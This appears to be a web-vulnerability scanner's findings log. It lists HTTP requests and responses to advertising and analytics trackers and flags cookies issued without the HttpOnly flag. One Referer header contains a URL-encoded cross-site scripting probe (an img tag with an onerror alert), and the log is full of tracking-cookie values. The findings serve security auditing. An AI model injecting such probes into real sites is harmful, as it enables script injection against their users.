GET /b/ss/superpagesadvert/1/H.14/s07192756696604 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:09 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:09 GMT Last-Modified: Fri, 04 Feb 2011 19:50:09 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www70 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s07964217748958 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:19:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:19:10 GMT Last-Modified: Fri, 04 Feb 2011 19:19:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www262 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s081445949617 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:10 GMT Last-Modified: Fri, 04 Feb 2011 19:50:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www384 Content-Length: 0 Content-Type: text/plain Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2174 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=s/wmp1UR22QsHNJo; bkc=...[SNIP]...; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:52:27 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:52:27 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=hgA1oXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=...[SNIP]...; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:52:27 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2491?ss_rand=637007605 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=hgA1oXUR22QsHNJo; bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; bkdc=res
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/353?rand=0.9526619226671755 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/videoegg/ad.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=UE2gfLUR22QsHNJo; bkc=...[SNIP]...; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:51:17 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:51:17 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=Rs4UCXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=...[SNIP]...; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:51:17 GMT; path=/; domain=.bluekai.com BK-Server: a96f Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/365 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bk=viY1yZVZbt/sHNJo; bkc=...[SNIP]...; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 21:59:56 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 21:59:56 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=gsKMbtVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5NW+GWNWDOrOdXZgEJnuuCSAuY2vAehYPa3GVqRvnSAoXQBCVQQI6OHzC6R6VqH1GoRCNGT/fDqYbvauCYXV3i2iam6WGYcWMiaxGT3jVWOd7EmqmfqZqZ47/4Ib8zII58Yl9Vyj0iRWLwuJwk8hwKpW/n/6OLKSOg9zOttXBzN88GCfy+N+GrjyZ+luy7hDQwsIRb8Uwm4ldF+0P2SaRjBId3Ptkdw+nxc92RXIwdSTQp4UvMtkIqKB9b6GZbTPkIXbR2sleUv2XByxWbiN6g2EsRIdReVcmvNzSSgf0D4+9ueoz6xbu6tUoY8wuqI8owdKECTs8ST55cykJzldkPNEFGlfP32gEtbD8gXp2IeT5bfz28dpIm23H2uBSjF5muuXLS/2x6KyZtgwIQlR2I8aCcAI8xoK7VTYoblt6l7XSt4msmSIXnx/1Ju0XvvU/EhgR36A/zNf8aFkT+TDA7SXyBG12ZoeZFwJ1UzNg2eTK4edwfML+7E/zc2KKoqlRHI4klf422Frh2hMZXjPoIP9Q427QiTjpCZA8URdu4iXw9CXIfUD5i6CpFU/AEB2uATVkDGdg2R9688Pw6w4DZS4dCx7+5LmzPpfopwKGT8nEFIMPwZwTN8etLnKVUdE66w88qWdsoH26uEX64Yoor4fC7Bdw7+gTfs1CSKIS2W058qgHtSd3OZKbondIk/8r+PpemPXMmp+5ot2/nf5Sy3IE6LN+6g6obDmsTtKNdymwKyqy; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:59:56 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:56 GMT Expires: Thu, 03 Feb 2011 20:32:56 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=705d98a7bc0e380c:TM=1296765176:LM=1296765176:S=sHB4e3nekqE-YD1z; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Tracking/V3/Instream/Impression/?0|1574|42244|30521|5745|14160|HEADER|868|2293|413|BBEEND|&internalRedirect=true&cb=%timestamp%&ss_rand=98204660 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel/?aid=148&tax=home HTTP/1.1 Host: uat.netmng.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evo5=kvrgygjr7baud%7C5SyprRh6TrnFV2ndAy2HxCPgLLX3cZ%2FVfx%2FM0biott%2BcqVbJj5aCj55h7IXdjMgE9ed9rfydUW6gLxzZ4Z8iZfTCEnvI5PEwDP8UgnDwsNwf1a3vDJnVlaVWQNH%2F7d2VqxBrm0%2Fc%2FidZYflVD0ff%2F1E5rmifbqDgfH2Gt1zhs%2F2MnA08vEEPGokDm1Bn1W68QLHQ%2FzChSJMJNtyVsrnHyb3E37wmvDfW6FFUnXFOPDqGRb7GXzLEZaSRaSPR19puBUpHlUpXwBEY7g3LfZ4F7q%2FoPuX4s88d6II7AqTrPBQvVC3dTHYL6Y342A5GTpvcniShvZas%2BmBrU%2Fz%2FqdmcKtLQoSpK8%2F1EMObPX4EqA7WzFB9kMN0WKt0l5SlxdqQCviV0iLESOVRgETizb2Os%2Fh1P9v%2FlebIMxnWdfb6%2Byln%2FJfmz2fudQYM%2FGfUhPWgueSqcoFf5wfZykby2hBxGOg%3D%3D
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:03:59 GMT Server: Apache/2.2.9 P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Tue, 01 Feb 2011 19:03:59 GMT Last-Modified: Tue, 01 Feb 2011 19:03:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5=kvrgygjr7baud%7CslbpB2OTqHJebVm%2BWLYhLSxmpA%2Bk0H4X%2BmBxXDdVODzOuKT2fiN3y3Y5%2FY%2FsvrMTk5MmDBp7hV7I6KwNAhVYdGvfRM%2Bt5tHVREa3RQX0svzHDl1LVEJkUgauiKULoRLwV%2Bz9EfZ7EbNR6AyPAOiKR2YDLplc5ZP%2FSQ6vGBOIIKPOPjcxxchwc%2Bo4nA5%2BXAHnXvznrsmn%2BcXyzWJFyo%2F7gsKfwS18nNxmub3nTC7jXt6PqmgrUCGB0%2B0vqAMDbEWNWkKk8aNor%2FvzClvR9YGDE1DDjaV8XMfY5k93PKcy7%2BcHAUsxt54LRmbEVOmofd1fIHKn0lsrW9GvKMll8AI8rXfZqe1UwR5PeLBmj4zS2RGDv2trchNe4um3wRa%2BvF6pKy4VT%2BDhUwGQ4LAm8Yog8lNAItduejTtfC9gbzyZMGm7yKAmWVLRZLZBSm7SpNBnA4SM6uA0wtdfTynqTvb5Hw%3D%3D; expires=Fri, 05-Aug-2011 19:03:59 GMT; path=/; domain=.netmng.com Location: http://ad.yieldmanager.com/pixel?id=582755&id=584778&id=584789&t=2 Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: video.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 03 Feb 2011 20:33:04 GMT Expires: Thu, 03 Feb 2011 20:33:04 GMT Cache-Control: private, max-age=0 Set-Cookie: PREF=ID=1be32f5d81ed4b3b:TM=1296765184:LM=1296765184:S=XUl03TgBOSGxaiOV; expires=Sat, 02-Feb-2013 20:33:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
